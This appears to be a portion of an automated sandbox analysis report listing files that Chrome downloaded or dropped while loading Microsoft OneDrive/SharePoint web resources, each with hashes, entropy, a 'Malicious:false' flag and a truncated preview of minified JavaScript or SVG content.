                                                          Preview:/*! For license information please see 29255.js.LICENSE.txt */."use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[29255],{24737:(e,t,n)=>{n.d(t,{q:()=>k});var a=n(539155),i=n(825268),r=n(146748),o=n(950936),s=n(824292),c=n(734157);const d=a.createContext(void 0),l=d.Provider;var u=n(563849),f=n(945945),p=n(769163),m=n(454403),_=n(545067),h=n(72352),b=n(612941),g=n(490539),v=n(904210),y=n(942474),S=n(82054),D=n(931041),I=n(554940),x=n(288820);const C="fui-FluentProvider",O=(0,I.X)({root:{sj55zd:"f19n0e5",De3pzq:"fxugw4r",fsow6f:["f1o700av","fes3tcz"],Bahqtrf:"fk6fouc",Be2twd7:"fkhj508",Bhrd7zp:"figsok6",Bg96gwp:"f1i3iumi"}},{d:[".f19n0e5{color:var(--colorNeutralForeground1);}",".fxugw4r{background-color:var(--colorNeutralBackground1);}",".f1o700av{text-align:left;}",".fes3tcz{text-align:right;}",".fk6fouc{font-family:var(--fontFamilyBase);}",".fkhj508{font-size:var(--fontSizeBase300);}",".figsok6{font-weight:var(--fontWeightRegular);}",".f1i3
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (12946)
                                                          Category:dropped
                                                          Size (bytes):3203921
                                                          Entropy (8bit):5.417416024331682
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:50D2EB8DE0E12D6EBD47BFAB7FFCA406
                                                          SHA1:26C9C2F578C3D74C32B3FDCAF81222BF1DB79A08
                                                          SHA-256:2D6743377BFCEAA606AEA551C4FFC6EF8C05A8906142FCA15078AC5180131C5B
                                                          SHA-512:89B60C11078220564A8BE22BB3BD8822AB1728F9EB2EFD0112882E3A20F21665E27A42A3A734A023FADE31ACFA96B9D4190C2E5B1681D0C2A0E7A5ECE2CE49AF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see odblightspeedwebpack.js.LICENSE.txt */.var __webpack_result__;(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odblightspeedwebpack"],[function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return d},c:function(){return c},d:function(){return s}});var a=n(15),i=n(828),r=new Map,o=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);r.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=r.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=this.id;if((0,i.a)()){var n=JSON.stringify(t);this.unpack=new Function("t","return t[".concat(n,"
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (15506)
                                                          Category:downloaded
                                                          Size (bytes):26582
                                                          Entropy (8bit):5.444338262913965
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4002A72DC29EB3C7141A07AB204A5B43
                                                          SHA1:EEBE150175A3BFD9696487B44072232B376B45FB
                                                          SHA-256:F57872A57C48911B9339D1EE78FB871D3F095B24991D43D2ECF5E33D0C6379E3
                                                          SHA-512:5354B93EA438D9D29282AA0F50FBAA36546FE696C1D2D447B8D869F6B3D9E0BBA076809CFC577482BF254CE3E4201B473962C134A5BDC1A1A865E15A75B4739C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/114.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[114],{1626:(e,t,n)=>{n.d(t,{a:()=>_,b:()=>m});var a=n(367),i=n("odsp.util_517"),r={ODB:61554};function o(){return i.ov.isFeatureEnabled(r)}var s={ODB:62043};function c(){return i.ov.isFeatureEnabled(s)}var d=!1;function l(e){var t,n=u("Error"),i=(0,a.a)();i.availability.customCopilotEAPCheckErrorType=e,null===(t=window.localStorage)||void 0===t||t.setItem(n,i.availability.customCopilotEAPCheckErrorType)}function u(e){return"UserInEAPGroup_".concat(e)}var f=n(96),p={ODB:61346};function m(e){var t,r,s=e.pageContextForEAPCheck,m=(0,a.a)();if(!i.x9.isActivated("87a98255-e313-4151-a344-a023c75eaadb","10/18/2024","isgulati - enable rcd check before enabling copilot")&&(null==s?void 0:s.IsRestrictedContentDiscoverabilityEnabled))return m.availability.isRCDEnabled=!0,!1;if(!i.x9.isActivated("99f050db-9dd7-4098-8772-9cee7e595faf","10/03/2024","isgulati - enable site check before enabling copilot")&&!function(e){var t=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4724)
                                                          Category:dropped
                                                          Size (bytes):22094
                                                          Entropy (8bit):5.321756942275413
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C7FB7F4046F8EB3F2258A0FCD6565264
                                                          SHA1:0B24BCA69B0975C5F06E5C9C513BFA4B76B99D06
                                                          SHA-256:D7E3E92E4779B33DFA9A6F05882C694C89DFE0FE64DDD0DE407C80134A104606
                                                          SHA-512:B861720487E0B8E0E2A19E59DAF0892E82A18D358E7F825C31077C38A685CF2713B2B3229DBA72F745208F1C2B07350B9F89A6815B1797ED75DD328A228CF516
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[243],{6282:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return y}});var a=n("tslib_538"),i=n(5),r=n(103),o=n(68),s=n(5021),c=n(5030),d=n(5031),l=n(6265),u=n(4397),f=n(4965),p=n(933),m=n(100),_=n(4971),h=n(6283),b=n(357),g=n(5034);function v(e,t){var n=t.itemKey,v=t.desiredSize,S=t.fitMode,D=t.requestOptions,I=e.demandItemFacet(o.a,n);if(!I)return{};var C=e.demandItemFacet(l.a,n)?function(e,t){var n=t.itemKey,a=t.desiredSize,i=t.fitMode,r=y(e.demandItemFacet(s.a,n));if(r&&r.large){var o=e.demandItemFacet(u.a,n),c=o&&(o["@microsoft.graph.downloadUrl"]||o["@content.downloadUrl"]),d=(0,_.a)(e,{itemKey:n});return{url:x(d&&c||r.large.url,a,i,d),width:0,height:0}}}(e,{itemKey:n,driveItem:I,desiredSize:v,fitMode:S}):function(e,t){var n,o=t.itemKey,s=t.driveItem,l=t.desiredSize,u=!!e.demandItemFacet(i.q,o),_=!!e.demandItemFacet(r.e,o);if(!u&&!_){if(!(null===(n=t.requestOptions)||void 0===n?void 0:n.allow
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):862
                                                          Entropy (8bit):4.837729584195234
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5EEE17FAACA889C47687AD39E4585273
                                                          SHA1:AE89E10486B8EC2CA38BE29ACBCF90117E0747AD
                                                          SHA-256:E12F4F21EDA26E30E5C4C9A92FA179B7CD16A2C2A68F2FAD64A686A64740FDD8
                                                          SHA-512:4DEF977D1E1B9D77A83BD38B6DAB27CC5A90D83E245B5B884574C2CA60B8BF6DCDA9A69F3F69A70C93EBF3B9ED0B92FF8D29A93ACF232151CCF869ADE13ABEA2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/addtoonedrive/shortcutbadge_12.svg
                                                          Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="12" height="12" rx="2.5" fill="white"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M3.5 3C3.22386 3 3 3.22386 3 3.5C3 3.77614 3.22386 4 3.5 4H7.29289L3.14645 8.14645C2.95118 8.34171 2.95118 8.65829 3.14645 8.85355C3.34171 9.04882 3.65829 9.04882 3.85355 8.85355L8 4.70711V8.5C8 8.77614 8.22386 9 8.5 9C8.77614 9 9 8.77614 9 8.5V3.5C9 3.22386 8.77614 3 8.5 3H3.5Z" fill="#0F6CBD"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M9.5 1H2.5C1.67157 1 1 1.67157 1 2.5V9.5C1 10.3284 1.67157 11 2.5 11H9.5C10.3284 11 11 10.3284 11 9.5V2.5C11 1.67157 10.3284 1 9.5 1ZM2.5 0C1.11929 0 0 1.11929 0 2.5V9.5C0 10.8807 1.11929 12 2.5 12H9.5C10.8807 12 12 10.8807 12 9.5V2.5C12 1.11929 10.8807 0 9.5 0H2.5Z" fill="#605E5C" fill-opacity="0.64"/>..</svg>..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2250)
                                                          Category:downloaded
                                                          Size (bytes):6323
                                                          Entropy (8bit):5.18227953183637
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5922E32B1C12E780315E675BB229CB4E
                                                          SHA1:8CEDB647A3CC16D91129F3770BA37B8B55F1B51E
                                                          SHA-256:D9EF14224888E063DF54A7852E0EDDF0CA174792DFDA37E7B6B885DBCAF7CCFA
                                                          SHA-512:8B8762A9EBFEEB76CD79D269D3E724443C0897C7130FD4595AC7A73A3F56EE3829640A3F210FA5A2D5DA7DE5A7DF1C357B5BE65EA3730EAEEB89F8BACB7A972E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/101.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[101],{1010:(e,t,n)=>{n.d(t,{a:()=>l});var a=n("react-dom-lib"),i=n("tslib_538"),r=n("react-lib"),o=n("fui.lcoms_357"),s=n(11),c=n("odsp.util_517");function d(){return!c.x9.isActivated("4BDEE9AA-40BA-4E0B-905B-33362718986A")&&(0,s.S)({ODB:61241})}var l,u=function(e){var t=e.children,n=r.useMemo(d,[]);return r.createElement(o.wj.Provider,{value:n},t)};l=c.x9.isActivated("26DDB843-862A-4916-A636-1BCE47633238")?a.render:function(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];var n=e[0],a=e.slice(1);return o.GSm.apply(void 0,(0,i.lt)([r.createElement(u,null,n)],a,!1))}}.,772:(e,t,n)=>{n.r(t),n.d(t,{ReactBridge:()=>S,asPreact:()=>D});var a=n("react-lib"),i=n(1),r=n(0),o=n(125),s=n(104),c=n("tslib_538"),d=n("react-dom-lib"),l=n("fui.util_175"),u=n(692),f=0,p=(0,l.uV)(function(e){return"".concat(++f)}),m=n(1010),_=(0,i.c)({render:function(e,t){(0,m.a)(e,t)},unmount:d.unmountComponentAtNode}),h="AsReactCh
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):111077
                                                          Entropy (8bit):5.494984638958259
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E96CF1A884594B2B481FEB811073AE86
                                                          SHA1:6A204F957C7E8732677AE680B13485F13FF4E955
                                                          SHA-256:CB11010D32BAFC0A65EF57D9B253DDE8A99C985CED609729A4D1C3A3256A0D56
                                                          SHA-512:DD0DF0447B049877C00013293F5E214C379B9E03C71E05F4164EF41140D46919C6240A9ABF14995AA3D2925332C13EEAE32A6945DFD09BB8C6295135D4652987
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/item-viewer-pdf/mspdfkit.min.js
                                                          Preview:var _scriptDir,mspdfkit=(_scriptDir="undefined"!=typeof document&&document.currentScript?document.currentScript.src:void 0,function(e){e=e||{};var t,n,r;t||(t=void 0!==e?e:{});t.ready=new Promise((function(e,t){n=e;r=t}));"_native_openDocument _native_openDocumentByChunk _native_openDocumentByProgressiveLoading _native_openMipDocument _native_closeDocument _native_reloadCurrentDocument _native_reloadCurrentDocumentByChunk _native_reloadCurrentDocumentWithOriginalStream _native_reloadFonts _native_getPageCount _native_getLayoutSize _native_getPageSize _native_getPageText _native_isMip _native_setColorScheme _native_updateViewportRect _native_render _native_rotate _native_selectAll _native_startFind _native_selectFindResult _native_stopFind _native_onPointerPressed _native_onPointerMoved _native_onPointerReleased _native_onMultiTapped _native_onChar _native_onKeyDown _native_copyFormSelectedText _native_onFocusPage _native_killFormFocus _native_hasFormOnPage _native_setAnnotationMode _na
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2368)
                                                          Category:downloaded
                                                          Size (bytes):2373
                                                          Entropy (8bit):5.209664079939711
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8F093F235607B29B1BB848A5F37C74A8
                                                          SHA1:F256DF68AA373A706598AF011DA8A8A4D3D4B585
                                                          SHA-256:3E52081FEA3968BC110FE15E9869911A4BE4C9BE9C9DDB69F0F043630AC1B124
                                                          SHA-512:36A82B004AAA71D0FAD75473296A876F96181F27AF509853E75A455DB2D3466258CCD1C903BC47250D4CA10D8A36FD3F55C411F4D420A7EB8BBA9B9D44986711
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/1943.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1943],{7269:function(e,t,n){n.r(t),n.d(t,{PdfSaveHelper:function(){return l},resourceKey:function(){return u}});var a=n("tslib_538"),i=n("odsp.util_517"),r=n(1185),o=n(9086),s=n(606),c=n(8901),d=n(334),l=function(){function e(e,t){void 0===e&&(e={});var n=t.vroomDataRequestor,a=t.saveExecutor,i=t.identityDataSource;this._vroomDataRequestor=n,this._saveExecutor=a,this._identityDataSource=i}return e.prototype.getItemCurrentVersion=function(e,t){return(0,a.yv)(this,void 0,void 0,function(){var n,i,r,o;return(0,a.SO)(this,function(a){switch(a.label){case 0:return n=void 0,i="/drive/items/".concat(e.itemId,"/versions?$select=id"),(0,c.m)()||!e.graph?[3,2]:(r=(0,d.e)(t),[4,this._identityDataSource.getSharePointToken(r)]);case 1:n=a.sent(),i="/drives/".concat(e.graph.driveId,"/items/").concat(e.itemId,"/versions?$select=id"),a.label=2;case 2:return[4,this._vroomDataRequestor.send({accessToken:n,apiName:"versions",pa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (7518)
                                                          Category:dropped
                                                          Size (bytes):30863
                                                          Entropy (8bit):5.408161932667197
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F83D39E9ACC9DA5C6AF7D4B7D16DB203
                                                          SHA1:3E03200E8332D189E90B85C5BFB68744A901F18F
                                                          SHA-256:BA14ADAA89072667749D049637B04AA8C02D5EFC6EDF53742AC7671844679DA1
                                                          SHA-512:ECB7C3D83F01FE99894FD9CAC095F1914D7D6E5690CDE47AFE433CE9D3645466FAA9B73EDF167784B7CEAF302C2488DEC026517FB0E140C034A024737BF759F8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[72],{2676:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("react-lib"),i=n(115),r=n(114),o=n("fui.core_932"),s=n(145);const c=(0,o.lj6)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"fzkkow9",vrafjx:["fcdblym","fjik90z"],oivjwe:"fg706s2",wvpqe5:["fjik90z","fcdblym"],B4j52fo:"f192inf7",Bekrc4i:["f5tn483","f1ojsxk5"],Bn0qgzm:"f1vxd6vx",ibv6hh:["f1ojsxk5","f5tn483"]},circular:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f44lkw9"},rounded:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5"},square:{},shadow:{E5pizo:"f1whvlc6"},center:{st4lth:"f1plgu50",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},contain:{st4lth:"f1kle4es",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},default:{},cover:{st4lth:"f1ps3kmd",Ermj5k
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (22018)
                                                          Category:downloaded
                                                          Size (bytes):23411
                                                          Entropy (8bit):5.437325290602816
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FC493FE7AE67E3B3D55D945AC76D8402
                                                          SHA1:5ED401A426E3418AC87283F3E18EDA4980898D7F
                                                          SHA-256:4090FB7F19FF3F36F55EE8BC82D907F728178508358C2082702847687ADF0302
                                                          SHA-512:CE6F05D83FFD3B01F73F8FD2ABD4516457B87EBCCFE599BE6E89FA3CF38DFB556FB55BCF91856A29CF5398756C3B9F23FFF1A31367B0C148B369A7697976B69F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/8487.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[8487],{508487:(e,t,n)=>{n.d(t,{$:()=>c});var a=n(539155),i=n(592151),r=n(137708),o=n(704860),s=n(945945);const c=a.forwardRef((e,t)=>{const n=(0,r.P)(e,t);return(0,o.B)(n),(0,s.$e)("useButtonStyles_unstable")(n),(0,i.e)(n)});c.displayName="Button"}.,592151:(e,t,n)=>{n.d(t,{e:()=>r});var a=n(825268),i=n(146748);const r=e=>{(0,i.C)(e);const{iconOnly:t,iconPosition:n}=e;return(0,a.kD)(e.root,{children:["after"!==n&&e.icon&&(0,a.Y)(e.icon,{}),!t&&e.root.children,"after"===n&&e.icon&&(0,a.Y)(e.icon,{})]})}}.,137708:(e,t,n)=>{n.d(t,{P:()=>s}),n(539155);var a=n(756716),i=n(490539),r=n(904210),o=n(197153);const s=(e,t)=>{const{size:n}=(0,o.j)(),{appearance:s="secondary",as:c="button",disabled:d=!1,disabledFocusable:l=!1,icon:u,iconPosition:f="before",shape:p="rounded",size:m=(null!=n?n:"medium")}=e,_=i.uq(u,{elementType:"span"});return{appearance:s,disabled:d,disabledFocusable:l,iconPosition:f,shape
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2063)
                                                          Category:downloaded
                                                          Size (bytes):3926
                                                          Entropy (8bit):5.343042800842879
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CC46BD0C075F72EE2D8639992D85B185
                                                          SHA1:3A9742A8FA54423AA0FD9BAAB7CF326CD032D5C3
                                                          SHA-256:5126C3C856FAED8BA9EC221C5CCF45311D000C8447DE9865F5FA319717084C2A
                                                          SHA-512:3C8FF6CC39A6B66B2313397ACE03C4086A86B927EC9D40A30FC0BE50607128E220BE51E26A768D96F6134B9A35C2BDBF1EDBFFE2444FB56AF015684255855946
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/106.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[106,94],{2030:(e,t,n)=>{var a;n.d(t,{a:()=>o,b:()=>r}),function(e){e.Create="Create",e.Update="Update",e.Delete="Delete"}(a||(a={}));var i=["isConflict"];function r(e){var t=function(t){if(e.hasOwnProperty(t)&&!i.find(function(e){return e===t}))return{value:{key:t,value:e[t]}}};for(var n in e){var a=t(n);if("object"==typeof a)return a.value}}function o(e,t){var n=e.filter(function(e){var n;return(null===(n=r(e))||void 0===n?void 0:n.key)===t});if(n){var a=r(n[0]);if(a)return a.value}}}.,842:(e,t,n)=>{n.r(t),n.d(t,{saveSyncIssues:()=>o});var a=n("tslib_538"),i=n(787),r=n(2029);function o(e,t){return(0,a.yv)(this,void 0,void 0,function(){var n;return(0,a.SO)(this,function(a){return n=(0,i.formatISPListRowAsIListSyncIssueAndItemKeys)(e,t).rows,(0,r.a)(n,"syncIssues"),[2]})})}}.,787:(e,t,n)=>{n.r(t),n.d(t,{formatIListSyncIssueAsISPListRow:()=>d,formatISPListRowAsIListSyncIssueAndItemKeys:()=>l,populateNucleusSync
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (40143)
                                                          Category:downloaded
                                                          Size (bytes):40148
                                                          Entropy (8bit):5.19658119392806
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:7B946890CEDDC4D26142E807398BBC18
                                                          SHA1:4DED6076AADD285E78960B71E59874EE08166DB6
                                                          SHA-256:5AFDA7910EDEFF7A7A34ADD0B9175B155543D6860B68DCECD4A56A83DAB3C193
                                                          SHA-512:D69F89CC304123DACE9DCD4C18567EEF9E21E66E63BC7A2FC8755AE501BD26D4B2AD6E8071BA6784D7BCB0621556DCEC2DDC5F8F2D6296CAECB73C9A031C6C63
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/475.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[475],{4586:function(e,t,n){n.d(t,{a:function(){return Ie}});var a={};n.r(a),n.d(a,{Decoder:function(){return _e},Encoder:function(){return pe},PacketType:function(){return fe},protocol:function(){return ue}});const i=Object.create(null);i.open="0",i.close="1",i.ping="2",i.pong="3",i.message="4",i.upgrade="5",i.noop="6";const r=Object.create(null);Object.keys(i).forEach(e=>{r[i[e]]=e});const o={type:"error",data:"parser error"},s="function"==typeof Blob||"undefined"!=typeof Blob&&"[object BlobConstructor]"===Object.prototype.toString.call(Blob),c="function"==typeof ArrayBuffer,d=e=>"function"==typeof ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer instanceof ArrayBuffer,l=({type:e,data:t},n,a)=>s&&t instanceof Blob?n?a(t):u(t,a):c&&(t instanceof ArrayBuffer||d(t))?n?a(t):u(new Blob([t]),a):a(i[e]+(t||"")),u=(e,t)=>{const n=new FileReader;return n.onload=function(){const e=n.result.split(",")[1];t("b"+(e||
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2784)
                                                          Category:downloaded
                                                          Size (bytes):2789
                                                          Entropy (8bit):4.849879284401003
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A574DB664B7F5874FF2EC71934D75E03
                                                          SHA1:6ABEA607E653E777573DADE7A226D4EE86ACDB69
                                                          SHA-256:45DCB468C5180660DC1EF6053C5A7A7BCEFEEAD2A3A9825BCC4920398EF6B0FB
                                                          SHA-512:B632CDE2BEF4D1B1F8D8871E21490DB9861A2726FD554A506E322B93AAA942A033306650DCD0AF39DB86B8FB112497DFD7C56FAB1146D3C202A03E72F8511A30
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/59926.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[59926],{459926:(e,t,n)=>{n.d(t,{FOR:()=>_,GUw:()=>o,MxZ:()=>c,NaX:()=>b,_gR:()=>s,bLf:()=>l,dvo:()=>i,gCR:()=>f,kUA:()=>r,nmU:()=>u,o4$:()=>h,pb6:()=>m,soY:()=>d,tP_:()=>p});var a=n(639691);const i=(0,a.U)("Checkmark12Filled","12",["M9.76 3.2c.3.29.32.76.04 1.06l-4.25 4.5a.75.75 0 0 1-1.08.02L2.22 6.53a.75.75 0 0 1 1.06-1.06l1.7 1.7L8.7 3.24a.75.75 0 0 1 1.06-.04Z"]),r=(0,a.U)("Checkmark16Filled","16",["M14.05 3.49c.28.3.27.77-.04 1.06l-7.93 7.47A.85.85 0 0 1 4.9 12L2.22 9.28a.75.75 0 1 1 1.06-1.06l2.24 2.27 7.47-7.04a.75.75 0 0 1 1.06.04Z"]),o=(0,a.U)("Checkmark24Regular","24",["M4.53 12.97a.75.75 0 0 0-1.06 1.06l4.5 4.5c.3.3.77.3 1.06 0l11-11a.75.75 0 0 0-1.06-1.06L8.5 16.94l-3.97-3.97Z"]),s=(0,a.U)("ChevronDoubleDown20Regular","20",["M15.85 8.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 9.35a.5.5 0 1 1 .7-.7L10 13.8l5.15-5.16c.2-.2.5-.2.7 0Zm0-4c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5527)
                                                          Category:downloaded
                                                          Size (bytes):11090
                                                          Entropy (8bit):5.114902054240588
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FE2E2EEFB0971B62A08838674CD19D9C
                                                          SHA1:7CE88E651BC966F7CBB54F742AE73113AED3B638
                                                          SHA-256:1BAFCD4D9E913332344493A85D3CAE1D98C26ACEB10E446F646A30BFC7DDAD00
                                                          SHA-512:D3FC1DD077D17063CB28E6C4BF801E79A87653B3B5AC54261B5823EBD87ED4A769BF0513D91CFAF21D362E192A7313141F80C7DE25BE0F1C0EF422B38F7ACC5A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/2125.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[2125,1966],{3379:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r}});var a=n(2852),i="32445A47-9E5D-4A63-A6FB-B8AF2225D90B",r=function(){function e(){this._allClientStatus=new Map,this._allUsers=new Map,this._clientUsers=new Map,this._userClientIds=new Map,this._pendingClientLeaveIds=new Set,this._interactiveClients=new Set,this._subscribers=new Set}return e.prototype.initPresenceStore=function(e){var t,n,i,r,o,s,c=this;this._currentUser=e.user;var d=e.clientInfos;if(d&&d.length>0)for(var l=0;l<d.length;l++){var u=d[l].client.clientId,f=d[l].lastUpdate,p=d[l].client.user.objectId,m=d[l].client.user;u&&f&&(null===(t=this._allClientStatus)||void 0===t||t.set(u,f)),m&&(null===(n=this._allUsers)||void 0===n||n.set(p,m),null===(i=this._clientUsers)||void 0===i||i.set(u,m),this._addUserClientId(p,u)),d[l].client.clientType!==a.a.nonInteractive&&(null===(r=this._interactiveClients)||void 0===r||r.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10191)
                                                          Category:downloaded
                                                          Size (bytes):10196
                                                          Entropy (8bit):5.115765622458522
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8452DB526D7A5023EA7E2B34D511A63E
                                                          SHA1:AE5D93026E583C12CC7F7E5374D1D7FC19E43C65
                                                          SHA-256:639CA25FA14B002A028E48AD35DFE41D53F3A1C24B65D8D1E5BBA78836A2A225
                                                          SHA-512:05B46DB2495FDBDC1F11B111CD2041A0BB7108AA334D5C158F6C0D363315399CD26739E3C5C19AE354C175155B2A8E8868876D38ADE67365F9D2CFBE588A8C44
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/46.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[46],{3595:function(e,t,n){n.d(t,{a:function(){return _}});var a,i=n("tslib_538"),r=function(){function e(){}return e.tokenCacheSessionStorageId="tokenCache",e.aboutToExpireIntervalSeconds=600,e.apiUrl="/_api/SP.OAuth.Token/Acquire",e.retries=3,e.retriableErrorCodes=[10006,10008],e.unexpectedErrorCodeFormat="Expected error code format is <numericCode>, <exception class name>",e.unexpectedTokenMessageFormat="Your token request succeedeed but the token could not be parsed from the response.This is most probably caused by a change in the server response format",e.npmPackageVersion="0.1.5",e}();!function(e){e[e.unknownError=0]="unknownError",e[e.malformedResponseBody=1]="malformedResponseBody",e[e.serverError=2]="serverError"}(a||(a={}));var o=function(e){function t(n,a){var i=e.call(this,a.message)||this;return i.__proto__=t.prototype,i._type=n,i._httpResponseStatus=a.httpResponseStatus,i._cultureName=a.cultureNa
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (12380)
                                                          Category:dropped
                                                          Size (bytes):27546
                                                          Entropy (8bit):5.487374056206014
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BA362DD2646C8AA29ED27C67A49B2F6F
                                                          SHA1:87E693300051075F784254E21902DCB8334C4AB0
                                                          SHA-256:B5412EF9BF37A531292453FD6279AB88BAEB0BDADD9974825B9C0F50BCB249E5
                                                          SHA-512:A0FDE4F1AF7EAFCC7C771D0C45AB921695E70D3992BDA578B921471CAD311E4579F55B446537D36BE0AFD40EB6F418AD46B2FAC39CE6B0D8187CADA989E9E58A
                                                          Malicious:false
                                                          Reputation:unknown
